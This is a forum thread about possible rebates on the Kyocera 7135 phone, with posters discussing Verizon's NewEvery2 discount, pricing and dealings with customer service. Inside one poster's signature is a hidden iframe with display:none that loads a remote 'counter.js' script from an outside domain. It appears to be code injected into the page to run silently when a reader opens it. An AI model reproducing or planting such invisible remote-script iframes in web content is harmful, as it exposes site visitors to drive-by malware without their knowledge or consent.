+ Reply to Thread

Thread: 7135 Rebate?

7135 Rebate?

A few rumors were tossed around a while ago about Kyocera possibly offering a rebate on the 7135 as a sort of introductory promotion. Would this only apply to phones purchased through Kyocera directly (GetConnected) or would those purchased through Verizon (or even yet, those that were eligible for a NE2 discount), be eligible as well? The reason I ask is because Verizon (in some sempiternity of ineptitude) managed to mail my new 2-year contract to the wrong address, and then claimed to have mailed a second one to the correct address that never arrived. Under any other circumstances I would be totally infuriated, but this is my week from hell, and I have too much work to finish to be worrying about (and playing with) a new toy. So if I might be eligible for a rebate on a phone that was purchased only after 4/28 for instance, I'll cancel my order (that is on hold until Verizon receives my signed contract) and reorder it. What do you think I should do? Please share your opinions, similar experiences/situations.

TGP<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    PhD., Technobabble

You're better off waiting until next week, when Verizon's supposed to begin offering the 7135 for a better price than the GetConnected price w/rebate offer. (The GC rebate offer also requires submission of 3 mos worth of VZW bills.)
    Ahhhh, gadgets! :bigthumb:

Hmmm. I still have two days left to decide whether to keep the phone or not. I want to keep it, but am I going to get a better deal if I return it, then purchase another one after the 28th? I paid $399 for mine with a two year contract and my NewEvery2 plan.

$399?

Verizon is charging $499 for the phone. Where did you find it for $399?

I'm a NewEvery2 customer with Verizon, where they give you $100 off a new phone every two years, along with any other promotions that are being offered.

NO you won't get a better deal. Don't return your phone.

I'm confused about the NE2 rebate. I've been using my 6035 on VZW since March 2001. I thought I would be eligible to receive the $100 discount. But when I called VZW to order my 7135, they said NE2 didn't start until Sep 2001. If this is the case, how is anyone getting NE2 discounts?

Is this just another example of VZW reps being clueless? After arguing with her, she did offer me a $50 credit if I ordered the phone for $499. Is this worth pursuing?

Originally posted by time2sell
    I'm confused about the NE2 rebate. I've been using my 6035 on VZW since March 2001. I thought I would be eligible to receive the $100 discount. But when I called VZW to order my 7135, they said NE2 didn't start until Sep 2001. If this is the case, how is anyone getting NE2 discounts?

Is this just another example of VZW reps being clueless? After arguing with her, she did offer me a $50 credit if I ordered the phone for $499. Is this worth pursuing?
    The NE2 is independent of when you got your last phone. It starts whenever you signed your last 2-year agreement, and you are eligible for the discount 22 months after that date. At that time, you are required to sign an additional 2-year contract to get the discount. So if you are in fact not yet eligible for the discount yet, grab any discount you can.

TGP
    PhD., Technobabble

The NE2 is independent of when you got your last phone. It starts whenever you signed your last 2-year agreement, and you are eligible for the discount 22 months after that date. At that time, you are required to sign an additional 2-year contract to get the discount. So if you are in fact not yet eligible for the discount yet, grab any discount you can.
    tgpaul-

Thanks for the quick reply!

I thought I had signed up for a 2 year contract. Of course, I can't remember for sure, I've changed plans about 5 times since then, and I have no copy of the original contract...

I'll give it another try. If no success, I'll take your advice and settle for the $499 less $50.

And I paid $599!!! Supposed to get $100 refund after paying Alltel for the 3rd months service.

John
    John R.

Verizon has $200 off the Thera right now for west coast and maybe midwest areas. wow! two months ago the Thera was $600 and now it's $300. maybe something is coming for the 7135? I need to wait about a month more before i can get mine anyways, so hopefully they'll have a rebate or discount by then

[QUOTE]Originally posted by time2sell
    [B]I'm confused about the NE2 rebate. I've been using my 6035 on VZW since March 2001. I thought I would be eligible to receive the $100 discount. But when I called VZW to order my 7135, they said NE2 didn't start until Sep 2001.

When I was in the store ordering mine a couple of weeks ago they tried to tell me the same thing. I got the 6035 the week it came out in March 2001. I complained and they put me on the phone with VZ CS. She tried to tell me I had to go home & get my contract-which I never signed then since I was already a customer. My advice: be strong, explain that they're records are wrong, tell them this appears to be a constant problem with them & that you've heard this before. If you have a bill showing that you were on a plan > $35/ mo from 2 yrs ago that would help your case too. I got them to relent, but you have to be firm but not nasty. Good luck.

[QUOTE]Originally posted by GButler
    [B]
    Originally posted by time2sell
    I'm confused about the NE2 rebate. I've been using my 6035 on VZW since March 2001. I thought I would be eligible to receive the $100 discount. But when I called VZW to order my 7135, they said NE2 didn't start until Sep 2001.

When I was in the store ordering mine a couple of weeks ago they tried to tell me the same thing. I got the 6035 the week it came out in March 2001. I complained and they put me on the phone with VZ CS. She tried to tell me I had to go home & get my contract-which I never signed then since I was already a customer. My advice: be strong, explain that they're records are wrong, tell them this appears to be a constant problem with them & that you've heard this before. If you have a bill showing that you were on a plan > $35/ mo from 2 yrs ago that would help your case too. I got them to relent, but you have to be firm but not nasty. Good luck.
    It is also important to remember that you are not automatically eligible for NE2 just because you have been a Verizon customer for 2 years. You must have signed a 2-year agreement at that time as well. This might have been obvious to some, but left others confused.

P.S. Got my 7135 today

TGP
    PhD., Technobabble